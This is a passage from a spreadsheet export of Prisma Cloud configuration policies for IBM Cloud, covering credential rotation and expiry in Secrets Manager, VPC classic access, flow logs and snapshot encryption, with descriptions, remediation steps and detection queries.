      <c r="AB3346" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3346" t="inlineStr">
        <is>
          <t>PC-IBM-ISM-1004</t>
        </is>
      </c>
      <c r="AD3346" t="b">
        <v>1</v>
      </c>
      <c r="AE3346" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3346" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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6" t="inlineStr">
        <is>
          <t>02c0e5b5-7c52-49ed-82d6-a31a3b38b645</t>
        </is>
      </c>
      <c r="AI3346" t="inlineStr">
        <is>
          <t>4623c547-2f07-4806-aa95-65f87aa54c8e</t>
        </is>
      </c>
      <c r="AJ3346" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3346" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3347">
      <c r="A3347" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, HITRUST CSF v.11.2.0, ITSG-33, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3347" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3347" s="2" t="inlineStr"/>
      <c r="D3347" t="inlineStr"/>
      <c r="E3347" t="inlineStr"/>
      <c r="F3347" t="inlineStr"/>
      <c r="G3347" t="b">
        <v>1</v>
      </c>
      <c r="H334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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3347" t="inlineStr">
        <is>
          <t>ibm-secret</t>
        </is>
      </c>
      <c r="K3347" t="inlineStr">
        <is>
          <t>IBM Cloud Secrets Manager user credentials with rotation policy more than 90 days</t>
        </is>
      </c>
      <c r="L3347" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3347" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3347" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3347" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3347" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3347" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R3347" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S3347" t="inlineStr"/>
      <c r="T3347" t="b">
        <v>0</v>
      </c>
      <c r="U3347" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3347" t="inlineStr">
        <is>
          <t>ibm-secret-manager-secret</t>
        </is>
      </c>
      <c r="W3347" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Secrets Manager user credentials with a rotation policy of more than 90 days.
IBM Cloud Secrets Manager allows you to securely store and manage user credentials (username and password) for accessing external services or applications. It provides a centralised way to store secrets, control their lifecycle, set expiration dates, and implement rotation policies. User credentials should be rotated to ensure that data cannot be accessed with an old password, which might have been lost, cracked, or stolen.
It is recommended to establish a rotation policy for user credentials, ensuring that they are regularly rotated within a period of less than 90 days.</t>
        </is>
      </c>
      <c r="X3347" t="inlineStr">
        <is>
          <t>To set a rotation policy for user credentials, follow the below steps:
1. Log in to the IBM Cloud Console
2. Click on the menu icon and navigate to 'Resource list'. From the list of resources, select the secret manager instance in which the reported secret resides under the security section.
3. Select the secret.
4. Under the 'Rotation' tab, enable 'Automatic secret rotation'.
5. Set 'Rotation Interval' to less than 90 days.
6. Set 'General password settings' according to the requirements.
6. Click on 'Update'.</t>
        </is>
      </c>
      <c r="Y3347" t="inlineStr"/>
      <c r="Z3347" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-secret-manager-secret' AND json.rule = state_description equal ignore case active and secret_type equal ignore case username_password and ( rotation.auto_rotate is false or (rotation.unit equal ignore case month and rotation.interval &gt; 3) or (rotation.unit equal ignore case day and rotation.interval &gt; 90))</t>
        </is>
      </c>
      <c r="AA3347" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3347" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3347" t="inlineStr">
        <is>
          <t>PC-IBM-ISM-1191</t>
        </is>
      </c>
      <c r="AD3347" t="b">
        <v>1</v>
      </c>
      <c r="AE3347" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3347" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG334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7" t="inlineStr">
        <is>
          <t>947c0aef-d310-4676-b9f1-7b46893131bf</t>
        </is>
      </c>
      <c r="AI3347" t="inlineStr">
        <is>
          <t>fb227848-ce9d-4baa-8678-cf1abf252739</t>
        </is>
      </c>
      <c r="AJ3347" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3347" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3348">
      <c r="A3348" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, TX-RAMP Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST CSF v2.0, CRI Profile v2.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 2, ITSG-33, CSA CCM v4.0.12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3348" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3348" s="2" t="inlineStr"/>
      <c r="D3348" t="inlineStr"/>
      <c r="E3348" t="inlineStr"/>
      <c r="F3348" t="inlineStr"/>
      <c r="G3348" t="b">
        <v>0</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3348" t="inlineStr">
        <is>
          <t>ibm-secret</t>
        </is>
      </c>
      <c r="K3348" t="inlineStr">
        <is>
          <t>IBM Cloud Secrets Manager user credentials have aged more than 90 days without being rotated</t>
        </is>
      </c>
      <c r="L3348" t="inlineStr"/>
      <c r="M3348" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3348" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3348" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3348" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3348" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R3348" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S3348" t="inlineStr"/>
      <c r="T3348" t="b">
        <v>0</v>
      </c>
      <c r="U3348" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3348" t="inlineStr">
        <is>
          <t>ibm-secret-manager-secret</t>
        </is>
      </c>
      <c r="W3348" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Secrets Manager user credentials that have aged more than 90 days without being rotated. User credentials should be rotated to ensure that data cannot be accessed with an old password which might have been lost, cracked, or stolen. It is recommended that user credentials are regularly rotated.</t>
        </is>
      </c>
      <c r="X3348" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on Menu Icon and navigate to 'Resource list'. From the list of resources, select the secret manager instance in which the reported secret resides, under security section.
3. Select the secret and click on 'Actions' dropdown.
4. Select 'Rotate' from the dropdown.
5. In the 'Rotate secret' screen, provide data as required.
6. Click on 'Rotate'.</t>
        </is>
      </c>
      <c r="Y3348" t="inlineStr"/>
      <c r="Z3348" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-secret-manager-secret' AND json.rule = 'secret_type equals username_password and state_description equal ignore case active and (_DateTime.ageInDays(last_update_date) &gt; 90)'</t>
        </is>
      </c>
      <c r="AA3348" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3348" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3348" t="inlineStr">
        <is>
          <t>PC-IBM-ISM-1005</t>
        </is>
      </c>
      <c r="AD3348" t="b">
        <v>1</v>
      </c>
      <c r="AE3348" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3348" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>eeaf2b3a-c4c0-4ca5-9e6d-a6bbcd278ad2</t>
        </is>
      </c>
      <c r="AI3348" t="inlineStr">
        <is>
          <t>9e2e87f7-0f5e-426d-969f-d6e5cde909a1</t>
        </is>
      </c>
      <c r="AJ3348" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3348" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3349">
      <c r="A3349" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3349" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3349" s="2" t="inlineStr"/>
      <c r="D3349" t="inlineStr"/>
      <c r="E3349" t="inlineStr"/>
      <c r="F3349" t="inlineStr"/>
      <c r="G3349" t="b">
        <v>1</v>
      </c>
      <c r="H33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49" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3349" t="inlineStr">
        <is>
          <t>ibm-secret</t>
        </is>
      </c>
      <c r="K3349" t="inlineStr">
        <is>
          <t>IBM Cloud Secrets Manager has expired arbitrary secrets</t>
        </is>
      </c>
      <c r="L3349" t="inlineStr"/>
      <c r="M3349" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3349" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3349" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3349" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3349" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R3349" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0005)</t>
        </is>
      </c>
      <c r="S3349" t="inlineStr"/>
      <c r="T3349" t="b">
        <v>0</v>
      </c>
      <c r="U3349" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3349" t="inlineStr">
        <is>
          <t>ibm-secret-manager-secret</t>
        </is>
      </c>
      <c r="W3349" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Secrets Manager arbitrary secret which is expired. Arbitrary secrets should be rotated to ensure that data cannot be accessed with an old secret which might have been lost, cracked, or stolen. It is recommended that all arbitrary secrets are set with expiration date and expired secrets should be regularly rotated.</t>
        </is>
      </c>
      <c r="X3349" t="inlineStr">
        <is>
          <t>If the IBM Cloud Secrets Manager Arbitrary secret is expired, the secret needs to be deleted.
Please use below URL as reference:
https://cloud.ibm.com/docs/secrets-manager?topic=secrets-manager-delete-secrets&amp;interface=ui#delete-secret-ui
If the IBM Cloud Secrets Manager Arbitrary secret is about to be expired, the secret has to be rotated.
Please use below URL as reference:
https://cloud.ibm.com/docs/secrets-manager?topic=secrets-manager-manual-rotation&amp;interface=ui#manual-rotate-arbitrary-ui
Make sure to set an expiration date for each secret.
Please follow the below steps to set an expiration date:
1. Log in to the IBM Cloud Console
2. Click on Menu Icon and navigate to 'Resource list', from the list of resources select secret manager instance in which the reported secret resides, under security section.
3. Select the secret.
4. Under 'Expiration date' section, provide expiration date as required.
6. Click on 'Update'.</t>
        </is>
      </c>
      <c r="Y3349" t="inlineStr"/>
      <c r="Z3349" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-secret-manager-secret' AND json.rule = 'secret_type equals arbitrary and (expiration_date does not exist or (_DateTime.ageInDays(expiration_date) &gt; -1))'</t>
        </is>
      </c>
      <c r="AA3349" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3349" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3349" t="inlineStr">
        <is>
          <t>PC-IBM-ISM-1006</t>
        </is>
      </c>
      <c r="AD3349" t="b">
        <v>1</v>
      </c>
      <c r="AE3349" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3349" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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49" t="inlineStr">
        <is>
          <t>42495fe7-948f-4f93-81e9-dc358f52f186</t>
        </is>
      </c>
      <c r="AI3349" t="inlineStr">
        <is>
          <t>8b567bac-6645-43c5-9482-6395ddd09f41</t>
        </is>
      </c>
      <c r="AJ3349" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3349" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3350">
      <c r="A3350" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3350" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3350" s="2" t="inlineStr"/>
      <c r="D3350" t="inlineStr"/>
      <c r="E3350" t="inlineStr"/>
      <c r="F3350" t="inlineStr"/>
      <c r="G3350" t="b">
        <v>1</v>
      </c>
      <c r="H335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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3350" t="inlineStr">
        <is>
          <t>ibm-secret</t>
        </is>
      </c>
      <c r="K3350" t="inlineStr">
        <is>
          <t>IBM Cloud Secrets Manager has expired user credentials</t>
        </is>
      </c>
      <c r="L3350" t="inlineStr"/>
      <c r="M3350" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3350" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3350" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3350" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3350" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R3350" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0005)</t>
        </is>
      </c>
      <c r="S3350" t="inlineStr"/>
      <c r="T3350" t="b">
        <v>0</v>
      </c>
      <c r="U3350" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3350" t="inlineStr">
        <is>
          <t>ibm-secret-manager-secret</t>
        </is>
      </c>
      <c r="W3350" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Secrets Manager user credential which is expired. User credentials should be rotated to ensure that data cannot be accessed with an old secret which might have been lost, cracked, or stolen. It is recommended that all user credentials are set with expiration date and expired secrets should be regularly rotated.</t>
        </is>
      </c>
      <c r="X3350" t="inlineStr">
        <is>
          <t>If the IBM Cloud Secrets Manager user credentials secret is expired, secret needs to be deleted.
Please use below URL as reference:
https://cloud.ibm.com/docs/secrets-manager?topic=secrets-manager-delete-secrets&amp;interface=ui#delete-secret-ui
If the IBM Cloud Secrets Manager user credentials is about to be expired, secret has to be rotated.
Please use below URL as reference:
https://cloud.ibm.com/docs/secrets-manager?topic=secrets-manager-manual-rotation&amp;interface=ui#manual-rotate-user-credentials-ui
Please make sure to set an expiration date for each secret. Please follow the below steps to set an expiration date:
1. Log in to the IBM Cloud Console
2. Click on Menu Icon and navigate to 'Resource list', from the list of resources select secret manager instance in which reported secret resides, under security section.
3. Select the secret.
4. Under 'Expiration date' section, provide expiration date as required.
5. Click on 'Update'.</t>
        </is>
      </c>
      <c r="Y3350" t="inlineStr"/>
      <c r="Z3350" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-secret-manager-secret' AND json.rule = 'secret_type equals username_password and (expiration_date does not exist or (_DateTime.ageInDays(expiration_date) &gt; -1))'</t>
        </is>
      </c>
      <c r="AA3350" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3350" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3350" t="inlineStr">
        <is>
          <t>PC-IBM-ISM-1007</t>
        </is>
      </c>
      <c r="AD3350" t="b">
        <v>1</v>
      </c>
      <c r="AE3350" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3350" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG335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0" t="inlineStr">
        <is>
          <t>d2443003-3e49-4e58-92fd-0e1be283f64d</t>
        </is>
      </c>
      <c r="AI3350" t="inlineStr">
        <is>
          <t>d67afc17-032b-4473-b3df-42881b1aa29c</t>
        </is>
      </c>
      <c r="AJ3350" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3350" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3351">
      <c r="A3351" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3351" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3351" s="2" t="inlineStr"/>
      <c r="D3351" t="inlineStr"/>
      <c r="E3351" t="inlineStr"/>
      <c r="F3351" t="inlineStr"/>
      <c r="G3351" t="b">
        <v>1</v>
      </c>
      <c r="H335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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3351" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3351" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Private Cloud (VPC) classic access is enabled</t>
        </is>
      </c>
      <c r="L3351" t="inlineStr"/>
      <c r="M3351" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3351" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3351" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3351" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3351" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R3351" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S3351" t="inlineStr"/>
      <c r="T3351" t="b">
        <v>0</v>
      </c>
      <c r="U3351" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3351" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="W3351" t="inlineStr">
        <is>
          <t>This policy identifies IBM Virtual Private Cloud where access to classic resources are enabled. If the classic access is enabled one can access &amp; communicate IBM Cloud classic infrastructure &amp; network from the VPC. Classic access should be disabled initially.</t>
        </is>
      </c>
      <c r="X3351" t="inlineStr">
        <is>
          <t>Refer to https://cloud.ibm.com/docs/vpc?topic=vpc-deleting-vpc-resources&amp;interface=ui to safely delete the affected VPC. Note- A VPC must be set up for classic access when it is created &amp; it cannot be updated to add or remove classic access.</t>
        </is>
      </c>
      <c r="Y3351" t="inlineStr"/>
      <c r="Z3351" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc' AND json.rule = classic_access is true</t>
        </is>
      </c>
      <c r="AA3351" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3351" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3351" t="inlineStr">
        <is>
          <t>PC-IBM-NET-980</t>
        </is>
      </c>
      <c r="AD3351" t="b">
        <v>1</v>
      </c>
      <c r="AE3351" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3351" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG335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1" t="inlineStr">
        <is>
          <t>e712ade9-87d3-4937-854d-604fa5c23cd6</t>
        </is>
      </c>
      <c r="AI3351" t="inlineStr">
        <is>
          <t>6d03ee54-ad92-433f-91c0-450c124a7140</t>
        </is>
      </c>
      <c r="AJ3351" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3351" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3352">
      <c r="A3352" t="inlineStr">
        <is>
          <t>Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, HITRUST CSF v.11.2.0, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B3352" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3352" s="2" t="inlineStr"/>
      <c r="D3352" t="inlineStr"/>
      <c r="E3352" t="inlineStr"/>
      <c r="F3352" t="inlineStr"/>
      <c r="G3352" t="b">
        <v>0</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3352" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3352" t="inlineStr">
        <is>
          <t>IBM Cloud VPC Flow Logs not enabled</t>
        </is>
      </c>
      <c r="L3352" t="inlineStr"/>
      <c r="M3352" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3352" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3352" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3352" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3352" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R3352" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S3352" t="inlineStr"/>
      <c r="T3352" t="b">
        <v>0</v>
      </c>
      <c r="U3352" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3352" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="W3352" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud VPCs which have flow logs disabled. VPC Flow logs capture information about IP traffic going to and from network interfaces in your VPC. Flow logs are used as a security tool to monitor the traffic that is reaching your instances. Without the flow logs turned on, it is not possible to get any visibility into network traffic.</t>
        </is>
      </c>
      <c r="X3352" t="inlineStr">
        <is>
          <t>To configure a Flow log on a VPC, please follow the below URL. Please make sure to provide target as 'VPC':
https://cloud.ibm.com/docs/vpc?topic=vpc-ordering-flow-log-collector&amp;interface=ui</t>
        </is>
      </c>
      <c r="Y3352" t="inlineStr"/>
      <c r="Z3352" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-vpc' as X; config from cloud.resource where api.name = 'ibm-vpc-flow-log-collector' as Y; filter 'not($.X.id equals $.Y.target.id)'; show X;</t>
        </is>
      </c>
      <c r="AA3352" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3352" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3352" t="inlineStr">
        <is>
          <t>PC-IBM-NET-1001</t>
        </is>
      </c>
      <c r="AD3352" t="b">
        <v>1</v>
      </c>
      <c r="AE3352" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3352" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>c666b20f-37de-4d28-83fa-b1d0e869d4ed</t>
        </is>
      </c>
      <c r="AI3352" t="inlineStr">
        <is>
          <t>837f7828-84c3-4d88-bb9b-af7ec51ff3bf</t>
        </is>
      </c>
      <c r="AJ3352" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3352" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3353">
      <c r="A3353" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3353" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3353" s="2" t="inlineStr"/>
      <c r="D3353" t="inlineStr"/>
      <c r="E3353" t="inlineStr"/>
      <c r="F3353" t="inlineStr"/>
      <c r="G3353" t="b">
        <v>0</v>
      </c>
      <c r="H33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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3353" t="inlineStr">
        <is>
          <t>ibm-vpc-block</t>
        </is>
      </c>
      <c r="K3353" t="inlineStr">
        <is>
          <t>IBM Cloud Block Storage Snapshot for VPC is not encrypted with customer managed keys</t>
        </is>
      </c>
      <c r="L3353" t="inlineStr"/>
      <c r="M3353" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3353" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3353" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3353" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3353" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3353" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3353" t="inlineStr"/>
      <c r="T3353" t="b">
        <v>0</v>
      </c>
      <c r="U3353" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3353" t="inlineStr">
        <is>
          <t>ibm-vpc-block-storage-snapshot</t>
        </is>
      </c>
      <c r="W3353" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Block Storage Snapshots for VPC, which are not encrypted with customer managed keys. Using customer managed keys will increase significant control where keys are managed by customers. As a best practice, use customer managed keys to encrypt the data and maintain control of your keys and sensitive data.</t>
        </is>
      </c>
      <c r="X3353" t="inlineStr">
        <is>
          <t>A Block storage snapshot can be encrypted with customer managed keys only at the time of creation of a virtual server instance. 
Please create a virtual service instance with boot/data disk from the reported snapshot using below URL. Please make sure to select customer managed encryption for data/boot storage volume:
